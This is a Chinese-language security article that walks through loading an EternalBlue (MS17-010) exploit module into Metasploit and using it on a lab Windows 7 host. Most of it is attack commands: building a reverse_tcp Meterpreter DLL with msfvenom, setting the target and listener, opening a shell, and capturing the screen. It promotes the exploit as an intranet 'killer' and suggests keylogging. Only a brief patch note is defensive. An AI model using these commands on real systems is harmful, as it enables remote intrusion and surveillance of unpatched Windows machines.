當前位置:
首頁 > 新聞 > 內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用

0x01 引言


2017年4月,網路最為轟動的事件無疑是TheShadowBrokers放出一大批NSA(美國國家安全局)「方程式組織」 (Equation Group)使用的極具破壞力的黑客工具,其中包括可以遠程攻破全球約70%Windows機器的漏洞利用工具。一夜之間,全世界70%的windows伺服器置於危險之中,國內使用windows伺服器的高校、國企甚至政府機構也不能倖免。這對互聯網無疑造成了一次大地震,因為已經很久沒有出現過像MS17-010這種級別的漏洞了,因此就被大家笑語說出了「指哪打哪」這樣一個事實。


受影響的Windows 版本包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8、Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等。


0x02 Eternalblue(MS17-010)漏洞介紹


漏洞原理詳見:NSA Eternalblue SMB漏洞分析

0x03 MS17-010漏洞的危害及修復措施


1.升級到微軟提供支持的Windows版本,並安裝補丁:https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/


2.安裝相關的防護措施,如緩衝區溢出防禦軟體、殺毒軟體。


3.無補丁的Windows版本,臨時關閉135、137、445埠和3389遠程登錄。


0x04 移植MS17-010漏洞利用代碼模塊


Metasploit集合了大量的系統漏洞利用代碼,但並不是擁有所有的漏洞代碼,所以Metasploit有一個非常強大的功能,它允許使用者開發自己的漏洞模塊,MS17-010的漏洞利用模塊Metasploit雖然還沒有集成,但是網路上已經有相應的滲透模塊了,這些模塊可能是用各種語言編寫的,比如perl、python等,Metasploit支持各種不同語言編寫的模塊移植到其框架中,通過這種機制可以將各種現存的模塊軟體移植成為與Metasploit兼容的滲透模塊。


當網路上Eternalblue漏洞烽煙四起,血流成河的時候,我在想為啥不把這個東西放到msf里去啊?現在外網伺服器大部分都打補丁了,但是內網相對比較薄弱,打補丁的管理員肯定不會太多啊。那特么不就是內網一個大殺器么。正當我在構思代碼要怎麼擼的時候,瞄到了推特上一條消息。

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



還說什麼,趕緊測試啊

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



我那個激動啊,還看想毛線啊,趕緊看看人家怎麼寫的去測試啊!


首先我們把它克隆到我們本地

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



我們可以在裡面修改一下一些默認的配置信息,(圖片中標註的是默認文件地址)

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



修改完成後,我們將他放到metasploit的目錄下供我們使用

(你想放哪裡放哪裡,這些都不重要,只要你記得住)


打開msf並重新載入全部文件

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



ok,載入完成後我們就可以讀取到我們新添加進去的模塊了

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



0x05 Metasploit下MS17-010漏洞提權實戰利用


攻擊機器kali:192.168.12.110


靶機win7 x32: 192.168.12.108

我們生成一個dll文件,是32位的系統就生成32位的dll,64位的系統就生成64位的系統,根據情況而定。


msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll


打開msf,使用我們自己的模塊


use exploit/windows/smb/eternalblue_doublepulsar


設置相關信息


set RHOST 192.168.12.108


我們需要設置payload來監聽攻擊成功後返回的shell


use exploit/multi/handler


set lhost 192.168.12.110


set lport 4444

set PAYLOAD windows/meterpreter/reverse_tcp


exploit


設置完成後

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



執行Exploit

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



我們成功獲取到了一個meterpreter會話


看一下對方ip

ifconfig

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用


內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



這個時候,我們就可以干一些壞壞的事情了,比如說看看屏幕、鍵盤記錄等等,我就截取個屏幕吧


screenshot

內網大殺器!Metasploit移植MS17-010漏洞代碼模塊利用



0x05 總結

這個漏洞剛出來的時候基本上可以通殺百分之七十的外網windows伺服器。截止到這會,根據我的內網測試結果,可以通殺百分之九十的Windows內網伺服器。


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

TAG:嘶吼RoarTalk |

您可能感興趣

價值10000美元的Tesla Model 3 XSS漏洞
Microsoft Windows CVE-2018-1040漏洞分析
深入分析Microsoft Outlook漏洞CVE-2018-8587
Linux中create_elf_tables函數整型溢出漏洞分析(CVE-2018-14634)
CVE-2019-0708漏洞:RDP=Really DO Patch?
iOS 12.1.4還包括一個Live Photos漏洞修復
CVE-2019-11815:Linux kernel漏洞
Microsoft Edge瀏覽器曝嚴重漏洞CVE-2018-8235,泄露敏感數據!
CVE-2019-0797 windows 0-day 漏洞分析
蘋果推送 iOS 12.1.4,修復 Group FaceTime 安全漏洞
蘋果今日推送iOS12.1.4 修復了Group Face Time漏洞
CVE-2019-0841:Windows許可權提升漏洞PoC
Cve-2019-6340 Drupal遠程代碼執行漏洞
關鍵漏洞CVE-2018-4013感染媒體播放器MPlayer與VLC
研究人員公開新CPU漏洞Spectre 1.1和Spectre 1.2
蘋果發布iOS 12.1.4更新 修復FaceTime漏洞
CVE-2019-0859:win32k.sys 0 day漏洞
iOS 12.1.4正式版更新 主要修復Group FaceTime的漏洞
Fallout EK歸來,加入CVE-2018-15982漏洞利用
從流量側淺談WebLogic遠程代碼執行漏洞(CVE-2018-3191)